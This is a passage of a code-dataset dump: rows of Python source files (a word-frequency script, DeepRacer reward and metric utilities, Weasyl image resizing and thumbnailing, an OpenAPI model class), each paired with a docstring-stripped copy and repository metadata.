most_recent_elem = None
for e in xs:
if e != most_recent_elem:
result.append(e)
most_recent_elem = e
return result
all_words = get_words_in_book("alice_in_wonderland.txt")
all_words.sort()
book_words = remove_adjacent_dups(all_words)
print("There are {0} words in the book. Only {1} are unique.".
format(len(all_words), len(book_words)))
print("The first 100 words are\n{0}".
format(book_words[:100]))
| 28.6875 | 79 | 0.615832 | def text_to_words(the_text):
my_substitutions = the_text.maketrans(
"ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"
# Replace them by these
"abcdefghijklmnopqrstuvwxyz ")
# Translate the text now.
cleaned_text = the_text.translate(my_substitutions)
wds = cleaned_text.split()
return wds
def get_words_in_book(filename):
f = open(filename, "r")
content = f.read()
f.close()
wds = text_to_words(content)
return wds
def remove_adjacent_dups(xs):
result = []
most_recent_elem = None
for e in xs:
if e != most_recent_elem:
result.append(e)
most_recent_elem = e
return result
all_words = get_words_in_book("alice_in_wonderland.txt")
all_words.sort()
book_words = remove_adjacent_dups(all_words)
print("There are {0} words in the book. Only {1} are unique.".
format(len(all_words), len(book_words)))
print("The first 100 words are\n{0}".
format(book_words[:100]))
| true | true |
1c2ccf7cdf5d9fe0d588b25248a61de676a451cb | 9,952 | py | Python | reinforcement_learning/rl_deepracer_robomaker_coach_gazebo/src/markov/agent_ctrl/utils.py | jpmarques19/tensorflwo-test | 0ff8b06e0415075c7269820d080284a42595bb2e | [
"Apache-2.0"
] | 5 | 2019-01-19T23:53:35.000Z | 2022-01-29T14:04:31.000Z | reinforcement_learning/rl_deepracer_robomaker_coach_gazebo/src/markov/agent_ctrl/utils.py | jpmarques19/tensorflwo-test | 0ff8b06e0415075c7269820d080284a42595bb2e | [
"Apache-2.0"
] | 4 | 2020-09-26T01:30:01.000Z | 2022-02-10T02:20:35.000Z | reinforcement_learning/rl_deepracer_robomaker_coach_gazebo/src/markov/agent_ctrl/utils.py | jpmarques19/tensorflwo-test | 0ff8b06e0415075c7269820d080284a42595bb2e | [
"Apache-2.0"
] | 7 | 2020-03-04T22:23:51.000Z | 2021-07-13T14:05:46.000Z | '''This module should house utility methods for the agent control classes'''
import json
import math
import logging
import markov.agent_ctrl.constants as const
from markov.metrics.constants import StepMetrics
from markov.agent_ctrl.constants import RewardParam
from markov.track_geom.constants import AgentPos, TrackNearDist, TrackNearPnts
from markov.log_handler.logger import Logger
from markov.log_handler.deepracer_exceptions import GenericRolloutException
from rl_coach.spaces import DiscreteActionSpace
from scipy.spatial.transform import Rotation
from markov.constants import SIMAPP_VERSION_1, SIMAPP_VERSION_2, SIMAPP_VERSION_3
LOGGER = Logger(__name__, logging.INFO).get_logger()
def set_reward_and_metrics(reward_params, step_metrics, agent_name, pos_dict, track_data,
data_dict, action, json_actions, car_pose):
'''Populates the reward_params and step_metrics dictionaries with the common
metrics and parameters.
reward_params - Dictionary containing the input parameters to the reward function
step_metrics - Dictionary containing the metrics that are sent to s3
agent_name - String of agent name
pos_dict - Dictionary containing the agent position data, keys defined in AgentPos
track_data - Object containing all the track information and geometry
data_dict - Dictionary containing previous progress, steps, and start distance
action - Integer containing the action to take
json_actions - Dictionary that maps action into steering and angle
car_pose - Gazebo Pose of the agent
'''
try:
# Check that the required keys are present in the dicts that are being
# passed in, these methods will throw an exception if a key is missing
RewardParam.validate_dict(reward_params)
# model point and distance
model_point = pos_dict[AgentPos.POINT.value]
current_ndist = track_data.get_norm_dist(model_point)
prev_index, next_index = track_data.find_prev_next_waypoints(current_ndist,
normalized=True)
# model progress starting at the initial waypoint
reverse_dir = track_data.reverse_dir
if reverse_dir:
reward_params[const.RewardParam.LEFT_CENT.value[0]] = \
not reward_params[const.RewardParam.LEFT_CENT.value[0]]
current_progress = current_ndist - data_dict['start_ndist']
current_progress = compute_current_prog(current_progress,
data_dict['prev_progress'])
# Geat the nearest points
nearest_pnts_dict = track_data.get_nearest_points(model_point)
# Compute distance from center and road width
nearest_dist_dict = track_data.get_nearest_dist(nearest_pnts_dict, model_point)
# Compute the distance from the previous and next points
distance_from_prev, distance_from_next = \
track_data.get_distance_from_next_and_prev(model_point, prev_index,
next_index)
# Compute which points are on the track
wheel_on_track = track_data.points_on_track(pos_dict[AgentPos.LINK_POINTS.value])
# Get the model orientation
model_orientation = pos_dict[AgentPos.ORIENTATION.value]
# Set the reward and metric parameters
step_metrics[StepMetrics.STEPS.value] = \
reward_params[RewardParam.STEPS.value[0]] = data_dict['steps']
reward_params[RewardParam.REVERSE.value[0]] = reverse_dir
step_metrics[StepMetrics.PROG.value] = \
reward_params[RewardParam.PROG.value[0]] = current_progress
reward_params[RewardParam.CENTER_DIST.value[0]] = \
nearest_dist_dict[TrackNearDist.NEAR_DIST_CENT.value]
reward_params[RewardParam.PROJECTION_DISTANCE.value[0]] = \
current_ndist * track_data.get_track_length()
reward_params[RewardParam.CLS_WAYPNY.value[0]] = [prev_index, next_index]
reward_params[RewardParam.LEFT_CENT.value[0]] = \
(nearest_dist_dict[TrackNearDist.NEAR_DIST_IN.value] < \
nearest_dist_dict[TrackNearDist.NEAR_DIST_OUT.value]) ^ (not track_data.is_ccw)
reward_params[RewardParam.WAYPNTS.value[0]] = track_data.get_way_pnts()
reward_params[RewardParam.TRACK_WIDTH.value[0]] = \
nearest_pnts_dict[TrackNearPnts.NEAR_PNT_IN.value] \
.distance(nearest_pnts_dict[TrackNearPnts.NEAR_PNT_OUT.value])
reward_params[RewardParam.TRACK_LEN.value[0]] = track_data.get_track_length()
step_metrics[StepMetrics.X.value] = \
reward_params[RewardParam.X.value[0]] = model_point.x
step_metrics[StepMetrics.Y.value] = \
reward_params[RewardParam.Y.value[0]] = model_point.y
step_metrics[StepMetrics.YAW.value] = \
reward_params[RewardParam.HEADING.value[0]] = \
Rotation.from_quat(model_orientation).as_euler('zyx')[0] * 180.0 / math.pi
step_metrics[StepMetrics.CLS_WAYPNT.value] = \
next_index if distance_from_next < distance_from_prev else prev_index
step_metrics[StepMetrics.TRACK_LEN.value] = track_data.get_track_length()
step_metrics[StepMetrics.STEER.value] = \
reward_params[RewardParam.STEER.value[0]] = \
float(json_actions[action]['steering_angle'])
step_metrics[StepMetrics.THROTTLE.value] = \
reward_params[RewardParam.SPEED.value[0]] = \
float(json_actions[action]['speed'])
step_metrics[StepMetrics.WHEELS_TRACK.value] = \
reward_params[RewardParam.WHEELS_ON_TRACK.value[0]] = all(wheel_on_track)
step_metrics[StepMetrics.ACTION.value] = action
# set extra reward param for obstacle
model_heading = reward_params[RewardParam.HEADING.value[0]]
obstacle_reward_params = track_data.get_object_reward_params(agent_name,
model_point,
car_pose)
if obstacle_reward_params:
reward_params.update(obstacle_reward_params)
except KeyError as ex:
raise GenericRolloutException("Key {}, not found".format(ex))
except Exception as ex:
raise GenericRolloutException('Cannot compute reward and metrics: {}'.format(ex))
def compute_current_prog(current_progress, prev_progress):
'''Returns the corrected current progress, this helper method checks to make user the
current progress is sensible.
current_progress - The current progress after taken a step
prev_progress - The progress in the previous step
'''
current_progress = 100 * current_progress
# if agent moving in reversed direction
if current_progress <= 0:
current_progress += 100
# cross finish line in normal direction
if prev_progress > current_progress + 50.0:
current_progress += 100.0
# cross finish line in reversed direction
if current_progress > prev_progress + 50.0:
current_progress -= 100.0
current_progress = min(current_progress, 100)
return current_progress
def get_normalized_progress(current_progress, start_ndist):
"""
Return normalized current progress with respect to START LINE of the track.
Args:
current_progress: current_progress to normalize (0 - 100)
start_ndist: start_ndist to offset (0.0 - 1.0)
Returns:
normalized current progress with respect to START LINE of the track.
"""
return (current_progress + start_ndist * 100) % 100
def send_action(velocity_pub_dict, steering_pub_dict, steering_angle, speed):
'''Publishes the given action to all the topics in the given dicts
velocity_pub_dict - Dictionary containing all the velocity joints
steering_pub_dict - Dictionary containing all the movable joints
steering_angle - Desired amount, in radians, to move the movable joints by
speed - Angular velocity which the velocity joints should rotate with
'''
for _, pub in velocity_pub_dict.items():
pub.publish(speed)
for _, pub in steering_pub_dict.items():
pub.publish(steering_angle)
def load_action_space(path_to_json):
'''Loads the action space from a given json file, loads default action space
is file upload fails.
path_to_json - Absolute path to the json file containing the action space
'''
json_actions = None
try:
# Try loading the custom model metadata (may or may not be present)
with open(path_to_json, 'r') as file:
model_metadata = json.load(file)
json_actions = model_metadata['action_space']
LOGGER.info("Loaded action space from file: %s", json_actions)
except Exception as ex:
# Failed to load, fall back on the default action space
from markov.defaults import model_metadata
json_actions = model_metadata['action_space']
LOGGER.info("Exception %s on loading custom action space, using default: %s", \
ex, json_actions)
action_space = DiscreteActionSpace(num_actions=len(json_actions),
default_action=next((i for i, v in enumerate(json_actions) \
if v['steering_angle'] == 0), None))
return action_space, json_actions
def get_speed_factor(version):
''' Returns the velocity factor for a given physics version
version (float): Sim app version for which to retrieve the velocity factor
'''
if version == SIMAPP_VERSION_3:
return 2.77
elif version == SIMAPP_VERSION_2:
return 3.5
elif version == SIMAPP_VERSION_1:
return 1.0
else:
raise Exception("No velocity factor for given version")
| 51.035897 | 99 | 0.686194 | import json
import math
import logging
import markov.agent_ctrl.constants as const
from markov.metrics.constants import StepMetrics
from markov.agent_ctrl.constants import RewardParam
from markov.track_geom.constants import AgentPos, TrackNearDist, TrackNearPnts
from markov.log_handler.logger import Logger
from markov.log_handler.deepracer_exceptions import GenericRolloutException
from rl_coach.spaces import DiscreteActionSpace
from scipy.spatial.transform import Rotation
from markov.constants import SIMAPP_VERSION_1, SIMAPP_VERSION_2, SIMAPP_VERSION_3
LOGGER = Logger(__name__, logging.INFO).get_logger()
def set_reward_and_metrics(reward_params, step_metrics, agent_name, pos_dict, track_data,
data_dict, action, json_actions, car_pose):
try:
RewardParam.validate_dict(reward_params)
model_point = pos_dict[AgentPos.POINT.value]
current_ndist = track_data.get_norm_dist(model_point)
prev_index, next_index = track_data.find_prev_next_waypoints(current_ndist,
normalized=True)
reverse_dir = track_data.reverse_dir
if reverse_dir:
reward_params[const.RewardParam.LEFT_CENT.value[0]] = \
not reward_params[const.RewardParam.LEFT_CENT.value[0]]
current_progress = current_ndist - data_dict['start_ndist']
current_progress = compute_current_prog(current_progress,
data_dict['prev_progress'])
nearest_pnts_dict = track_data.get_nearest_points(model_point)
nearest_dist_dict = track_data.get_nearest_dist(nearest_pnts_dict, model_point)
distance_from_prev, distance_from_next = \
track_data.get_distance_from_next_and_prev(model_point, prev_index,
next_index)
wheel_on_track = track_data.points_on_track(pos_dict[AgentPos.LINK_POINTS.value])
model_orientation = pos_dict[AgentPos.ORIENTATION.value]
step_metrics[StepMetrics.STEPS.value] = \
reward_params[RewardParam.STEPS.value[0]] = data_dict['steps']
reward_params[RewardParam.REVERSE.value[0]] = reverse_dir
step_metrics[StepMetrics.PROG.value] = \
reward_params[RewardParam.PROG.value[0]] = current_progress
reward_params[RewardParam.CENTER_DIST.value[0]] = \
nearest_dist_dict[TrackNearDist.NEAR_DIST_CENT.value]
reward_params[RewardParam.PROJECTION_DISTANCE.value[0]] = \
current_ndist * track_data.get_track_length()
reward_params[RewardParam.CLS_WAYPNY.value[0]] = [prev_index, next_index]
reward_params[RewardParam.LEFT_CENT.value[0]] = \
(nearest_dist_dict[TrackNearDist.NEAR_DIST_IN.value] < \
nearest_dist_dict[TrackNearDist.NEAR_DIST_OUT.value]) ^ (not track_data.is_ccw)
reward_params[RewardParam.WAYPNTS.value[0]] = track_data.get_way_pnts()
reward_params[RewardParam.TRACK_WIDTH.value[0]] = \
nearest_pnts_dict[TrackNearPnts.NEAR_PNT_IN.value] \
.distance(nearest_pnts_dict[TrackNearPnts.NEAR_PNT_OUT.value])
reward_params[RewardParam.TRACK_LEN.value[0]] = track_data.get_track_length()
step_metrics[StepMetrics.X.value] = \
reward_params[RewardParam.X.value[0]] = model_point.x
step_metrics[StepMetrics.Y.value] = \
reward_params[RewardParam.Y.value[0]] = model_point.y
step_metrics[StepMetrics.YAW.value] = \
reward_params[RewardParam.HEADING.value[0]] = \
Rotation.from_quat(model_orientation).as_euler('zyx')[0] * 180.0 / math.pi
step_metrics[StepMetrics.CLS_WAYPNT.value] = \
next_index if distance_from_next < distance_from_prev else prev_index
step_metrics[StepMetrics.TRACK_LEN.value] = track_data.get_track_length()
step_metrics[StepMetrics.STEER.value] = \
reward_params[RewardParam.STEER.value[0]] = \
float(json_actions[action]['steering_angle'])
step_metrics[StepMetrics.THROTTLE.value] = \
reward_params[RewardParam.SPEED.value[0]] = \
float(json_actions[action]['speed'])
step_metrics[StepMetrics.WHEELS_TRACK.value] = \
reward_params[RewardParam.WHEELS_ON_TRACK.value[0]] = all(wheel_on_track)
step_metrics[StepMetrics.ACTION.value] = action
model_heading = reward_params[RewardParam.HEADING.value[0]]
obstacle_reward_params = track_data.get_object_reward_params(agent_name,
model_point,
car_pose)
if obstacle_reward_params:
reward_params.update(obstacle_reward_params)
except KeyError as ex:
raise GenericRolloutException("Key {}, not found".format(ex))
except Exception as ex:
raise GenericRolloutException('Cannot compute reward and metrics: {}'.format(ex))
def compute_current_prog(current_progress, prev_progress):
current_progress = 100 * current_progress
if current_progress <= 0:
current_progress += 100
if prev_progress > current_progress + 50.0:
current_progress += 100.0
if current_progress > prev_progress + 50.0:
current_progress -= 100.0
current_progress = min(current_progress, 100)
return current_progress
def get_normalized_progress(current_progress, start_ndist):
return (current_progress + start_ndist * 100) % 100
def send_action(velocity_pub_dict, steering_pub_dict, steering_angle, speed):
for _, pub in velocity_pub_dict.items():
pub.publish(speed)
for _, pub in steering_pub_dict.items():
pub.publish(steering_angle)
def load_action_space(path_to_json):
json_actions = None
try:
with open(path_to_json, 'r') as file:
model_metadata = json.load(file)
json_actions = model_metadata['action_space']
LOGGER.info("Loaded action space from file: %s", json_actions)
except Exception as ex:
from markov.defaults import model_metadata
json_actions = model_metadata['action_space']
LOGGER.info("Exception %s on loading custom action space, using default: %s", \
ex, json_actions)
action_space = DiscreteActionSpace(num_actions=len(json_actions),
default_action=next((i for i, v in enumerate(json_actions) \
if v['steering_angle'] == 0), None))
return action_space, json_actions
def get_speed_factor(version):
if version == SIMAPP_VERSION_3:
return 2.77
elif version == SIMAPP_VERSION_2:
return 3.5
elif version == SIMAPP_VERSION_1:
return 1.0
else:
raise Exception("No velocity factor for given version")
| true | true |
1c2cd1474a3b9481174d115859d86e3006790643 | 8,437 | py | Python | libweasyl/libweasyl/images.py | akash143143/weasyl | be42a2313e657e97c4a48432379e37b6a3d4a4af | [
"Apache-2.0"
] | null | null | null | libweasyl/libweasyl/images.py | akash143143/weasyl | be42a2313e657e97c4a48432379e37b6a3d4a4af | [
"Apache-2.0"
] | null | null | null | libweasyl/libweasyl/images.py | akash143143/weasyl | be42a2313e657e97c4a48432379e37b6a3d4a4af | [
"Apache-2.0"
] | null | null | null | """
Image manipulation.
This module defines functions which work on sanpera_ ``Image`` objects.
.. _sanpera: https://pypi.python.org/pypi/sanpera
"""
from __future__ import division
from sanpera.image import Image
from sanpera import geometry
from libweasyl.exceptions import ThumbnailingError
COVER_SIZE = 1024, 3000
"The maximum size of a cover image, in pixels."
THUMB_HEIGHT = 250
"The maximum height of a thumbnail, in pixels."
read = Image.read
"""
libweasyl.images.read(*filename*)
Read an ``Image`` from disk using the given filename.
Parameters:
filename: The filename of the image to load.
Returns:
A sanpera ``Image``.
"""
from_buffer = Image.from_buffer
"""
libweasyl.images.from_buffer(*data*)
Parse some data into an ``Image``.
Parameters:
data: :term:`bytes`.
Returns:
A sanpera ``Image``.
"""
IMAGE_EXTENSIONS = {
b'JPG': '.jpg',
b'JPEG': '.jpg',
b'PNG': '.png',
b'GIF': '.gif',
}
def image_extension(im):
"""
Given a sanpera ``Image``, return the file extension corresponding with the
original format of the image.
Parameters:
im: A sanpera ``Image``.
Returns:
:term:`native string`: one of ``.jpg``, ``.png``, ``.gif``, or ``None``
if the format was unknown.
"""
return IMAGE_EXTENSIONS.get(im.original_format)
def image_file_type(im):
"""
Given a sanpera ``Image``, return the file type of the original format of
the image.
This is basically the same as :py:func:`.image_extension`, except it
doesn't return a leading ``.`` on the format.
Parameters:
im: A sanpera ``Image``.
Returns:
:term:`native string`: one of ``jpg``, ``png``, ``gif``, or ``None`` if
the format was unknown.
"""
ret = image_extension(im)
if ret is not None:
ret = ret.lstrip('.')
return ret
def unanimate(im):
"""
Get the non-animated version of a sanpera ``Image``.
Paramters:
im: A sanpera ``Image``.
Returns:
*im*, if it wasn't animated, or a new ``Image`` with just the first
frame of *im* if it was.
"""
if len(im) == 1:
return im
ret = Image()
ret.append(im[0])
return ret
def correct_image_and_call(f, im, *a, **kw):
"""
Call a function, passing in an image where the canvas size of each frame is
the same.
The function will be called as ``f(im, *a, **kw)`` and can return an image
to post-process or ``None``. Post-processing is currently limited to
optimizing animated GIFs.
Parameters:
f: The function to call.
im: A sanpera ``Image``.
*a: Positional arguments with which to call *f*.
**kw: Keyword arguments with which to call *f*.
Returns:
*im*, if *f* returned ``None``, or the ``Image`` returned by *f* after
post-processing.
"""
animated = len(im) > 1
# either of these operations make the image satisfy the contraint
# `all(im.size == frame.size for frame in im)`
if animated:
im = im.coalesced()
else:
im = im.cropped(im[0].canvas)
# returns a new image to post-process or None
im = f(im, *a, **kw)
if animated and im is not None:
im = im.optimized_for_animated_gif()
return im
def _resize(im, width, height):
# resize only if we need to; return None if we don't
if im.size.width > width or im.size.height > height:
im = im.resized(im.size.fit_inside((width, height)))
return im
def resize_image(im, width, height):
"""
Resize an image if necessary. Will not resize images that fit entirely
within target dimensions.
Parameters:
im: A sanpera ``Image``.
width: The maximum width, in pixels.
height: The maximum height, in pixels.
Returns:
*im*, if the image is smaller than the given *width* and *height*.
Otherwise, a new ``Image`` resized to fit.
"""
return correct_image_and_call(_resize, im, width, height) or im
def make_cover_image(im):
"""
Make a cover image.
That is, resize an image to be smaller than :py:data:`COVER_SIZE` if
necessary.
Parameters:
im: A sanpera ``Image``.
Returns:
*im*, if the image is smaller than :py:data:`COVER_SIZE`. Otherwise, a
new ``Image`` resized to fit.
"""
return resize_image(im, *COVER_SIZE)
def _height_resize(im, height, bounds=None):
"""Creates an image scaled to no more than the specified height with 0.5 <= aspect ratio <= 2."""
def crop_image_to_width(image, width): # Crops from both sides equally.
overflow = image.size.width - width
border = overflow / 2
crop_rect = geometry.Rectangle(border, 0, border + width, image.size.height)
return image.cropped(crop_rect)
def crop_image_to_height(image, height): # Crops from the bottom.
crop_rect = geometry.Rectangle(0, 0, image.size.width, height)
return image.cropped(crop_rect)
def scale_image_to_height(image, height):
new_width = (image.size.width * height) / image.size.height
return image.resized((new_width, height))
if bounds is not None:
# TODO: Add some checks here. e.g. make sure bounds are smaller
# than the original image.
if bounds.size != im.size:
im = im.cropped(bounds)
aspect_ratio = float(im.size.width) / im.size.height
if im.size.height > height:
if aspect_ratio > 2: # Image is too wide.
thumb = crop_image_to_width(im, im.size.height * 2)
elif aspect_ratio < 0.5: # Image is too tall.
new_height = im.size.width * 2
if new_height < height:
new_height = height
thumb = crop_image_to_height(im, new_height)
else:
thumb = im
thumb = scale_image_to_height(thumb, height)
else: # Height `height` or less.
if im.size.width > height * 2:
thumb = crop_image_to_width(im, height * 2)
else:
thumb = im
return thumb
def height_resize(im, height, bounds=None):
"""
Resize and crop an image to look good at a specified height.
The image is resized and cropped according to the following rules:
If *im* is not taller than *height*, its width is checked. If it is wider than
2 * *height*, it will be cropped from both sides down to 2 * *height* width.
If the *im* is taller than *height* its aspect ratio is considered: If *im* is
more than twice as wide as it is tall, it will be cropped equally from both
left and right to be twice as wide as it is tall. If *im* is more than twice as
tall as it is wide, it will be cropped from the bottom to be twice as tall as it
is wide, but not if this would make it shorter than *height*.
After cropping is considered, the image will be resized proportionally to be
*height* pixels tall.
Parameters:
im: A sanpera ``Image``.
size: The desired height of the resulting image.
bounds: Optionally, a sanpera ``Rectangle`` to use to crop *im* before
resizing it.
Returns:
*im*, if it is no taller than *height* and no wider than 2 * *height*.
Otherwise, a new ``Image`` resized and/or cropped according to the rules
above.
"""
ret = correct_image_and_call(_height_resize, im, height, bounds)
if ret.size.height > height or (len(ret) == 1 and ret[0].size.height > height):
# This is a sanity test to make sure the output of _height_resize()
# conforms to our height contract.
raise ThumbnailingError(ret.size, ret[0].size)
return ret
def make_thumbnail(im, bounds=None):
"""
Make a thumbnail.
That is, resize an image to be no taller than :py:data:`THUMB_HEIGHT` if
necessary after unanimating it and maintain a reasonable aspect ratio (2x)
if possible.
Parameters:
im: A sanpera ``Image``.
bounds: Optionally, a sanpera ``Rectangle`` to use to crop *im* before
generating a thumbnail from it.
Returns:
*im*, if the image is smaller than :py:data:`THUMB_HEIGHT` by twice
:py:data:`THUMB_HEIGHT` and contains only a single frame. Otherwise,
a new single-frame ``Image`` resized to fit within the bounds.
"""
return height_resize(unanimate(im), THUMB_HEIGHT, bounds)
| 29.603509 | 101 | 0.633875 |
from __future__ import division
from sanpera.image import Image
from sanpera import geometry
from libweasyl.exceptions import ThumbnailingError
COVER_SIZE = 1024, 3000
THUMB_HEIGHT = 250
read = Image.read
from_buffer = Image.from_buffer
IMAGE_EXTENSIONS = {
b'JPG': '.jpg',
b'JPEG': '.jpg',
b'PNG': '.png',
b'GIF': '.gif',
}
def image_extension(im):
return IMAGE_EXTENSIONS.get(im.original_format)
def image_file_type(im):
ret = image_extension(im)
if ret is not None:
ret = ret.lstrip('.')
return ret
def unanimate(im):
if len(im) == 1:
return im
ret = Image()
ret.append(im[0])
return ret
def correct_image_and_call(f, im, *a, **kw):
animated = len(im) > 1
if animated:
im = im.coalesced()
else:
im = im.cropped(im[0].canvas)
im = f(im, *a, **kw)
if animated and im is not None:
im = im.optimized_for_animated_gif()
return im
def _resize(im, width, height):
if im.size.width > width or im.size.height > height:
im = im.resized(im.size.fit_inside((width, height)))
return im
def resize_image(im, width, height):
return correct_image_and_call(_resize, im, width, height) or im
def make_cover_image(im):
return resize_image(im, *COVER_SIZE)
def _height_resize(im, height, bounds=None):
def crop_image_to_width(image, width): # Crops from both sides equally.
overflow = image.size.width - width
border = overflow / 2
crop_rect = geometry.Rectangle(border, 0, border + width, image.size.height)
return image.cropped(crop_rect)
def crop_image_to_height(image, height): # Crops from the bottom.
crop_rect = geometry.Rectangle(0, 0, image.size.width, height)
return image.cropped(crop_rect)
def scale_image_to_height(image, height):
new_width = (image.size.width * height) / image.size.height
return image.resized((new_width, height))
if bounds is not None:
# TODO: Add some checks here. e.g. make sure bounds are smaller
# than the original image.
if bounds.size != im.size:
im = im.cropped(bounds)
aspect_ratio = float(im.size.width) / im.size.height
if im.size.height > height:
if aspect_ratio > 2: # Image is too wide.
thumb = crop_image_to_width(im, im.size.height * 2)
elif aspect_ratio < 0.5: # Image is too tall.
new_height = im.size.width * 2
if new_height < height:
new_height = height
thumb = crop_image_to_height(im, new_height)
else:
thumb = im
thumb = scale_image_to_height(thumb, height)
else: # Height `height` or less.
if im.size.width > height * 2:
thumb = crop_image_to_width(im, height * 2)
else:
thumb = im
return thumb
def height_resize(im, height, bounds=None):
ret = correct_image_and_call(_height_resize, im, height, bounds)
if ret.size.height > height or (len(ret) == 1 and ret[0].size.height > height):
# This is a sanity test to make sure the output of _height_resize()
# conforms to our height contract.
raise ThumbnailingError(ret.size, ret[0].size)
return ret
def make_thumbnail(im, bounds=None):
return height_resize(unanimate(im), THUMB_HEIGHT, bounds)
| true | true |
1c2cd14fafa9f48e4ed0479faf1803de1b1978dd | 4,715 | py | Python | criteo_marketing_transition/models/basic_audience_definition.py | criteo/criteo-python-marketing-transition-sdk | d6d19a23d87ab62eb4810f41490cebab9c72882f | [
"Apache-2.0"
] | null | null | null | criteo_marketing_transition/models/basic_audience_definition.py | criteo/criteo-python-marketing-transition-sdk | d6d19a23d87ab62eb4810f41490cebab9c72882f | [
"Apache-2.0"
] | null | null | null | criteo_marketing_transition/models/basic_audience_definition.py | criteo/criteo-python-marketing-transition-sdk | d6d19a23d87ab62eb4810f41490cebab9c72882f | [
"Apache-2.0"
] | 1 | 2022-02-21T11:16:20.000Z | 2022-02-21T11:16:20.000Z | # coding: utf-8
"""
Criteo API Transition Swagger
This is used to help Criteo clients transition from MAPI to Criteo API # noqa: E501
The version of the OpenAPI document: 1.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
class BasicAudienceDefinition(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'id': 'str',
'type': 'str',
'attributes': 'AudienceNameDescription'
}
attribute_map = {
'id': 'id',
'type': 'type',
'attributes': 'attributes'
}
def __init__(self, id=None, type=None, attributes=None): # noqa: E501
"""BasicAudienceDefinition - a model defined in OpenAPI""" # noqa: E501
self._id = None
self._type = None
self._attributes = None
self.discriminator = None
self.id = id
self.type = type
if attributes is not None:
self.attributes = attributes
@property
def id(self):
"""Gets the id of this BasicAudienceDefinition. # noqa: E501
the id of the entity type # noqa: E501
:return: The id of this BasicAudienceDefinition. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this BasicAudienceDefinition.
the id of the entity type # noqa: E501
:param id: The id of this BasicAudienceDefinition. # noqa: E501
:type: str
"""
if id is None:
raise ValueError("Invalid value for `id`, must not be `None`") # noqa: E501
self._id = id
@property
def type(self):
"""Gets the type of this BasicAudienceDefinition. # noqa: E501
the name of the entity type # noqa: E501
:return: The type of this BasicAudienceDefinition. # noqa: E501
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this BasicAudienceDefinition.
the name of the entity type # noqa: E501
:param type: The type of this BasicAudienceDefinition. # noqa: E501
:type: str
"""
if type is None:
raise ValueError("Invalid value for `type`, must not be `None`") # noqa: E501
self._type = type
@property
def attributes(self):
"""Gets the attributes of this BasicAudienceDefinition. # noqa: E501
:return: The attributes of this BasicAudienceDefinition. # noqa: E501
:rtype: AudienceNameDescription
"""
return self._attributes
@attributes.setter
def attributes(self, attributes):
"""Sets the attributes of this BasicAudienceDefinition.
:param attributes: The attributes of this BasicAudienceDefinition. # noqa: E501
:type: AudienceNameDescription
"""
self._attributes = attributes
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, BasicAudienceDefinition):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 27.573099 | 90 | 0.572216 |
import pprint
import re
import six
class BasicAudienceDefinition(object):
openapi_types = {
'id': 'str',
'type': 'str',
'attributes': 'AudienceNameDescription'
}
attribute_map = {
'id': 'id',
'type': 'type',
'attributes': 'attributes'
}
def __init__(self, id=None, type=None, attributes=None):
self._id = None
self._type = None
self._attributes = None
self.discriminator = None
self.id = id
self.type = type
if attributes is not None:
self.attributes = attributes
@property
def id(self):
return self._id
@id.setter
def id(self, id):
if id is None:
raise ValueError("Invalid value for `id`, must not be `None`")
self._id = id
@property
def type(self):
return self._type
@type.setter
def type(self, type):
if type is None:
raise ValueError("Invalid value for `type`, must not be `None`")
self._type = type
@property
def attributes(self):
return self._attributes
@attributes.setter
def attributes(self, attributes):
self._attributes = attributes
def to_dict(self):
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
return pprint.pformat(self.to_dict())
def __repr__(self):
return self.to_str()
def __eq__(self, other):
if not isinstance(other, BasicAudienceDefinition):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| true | true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.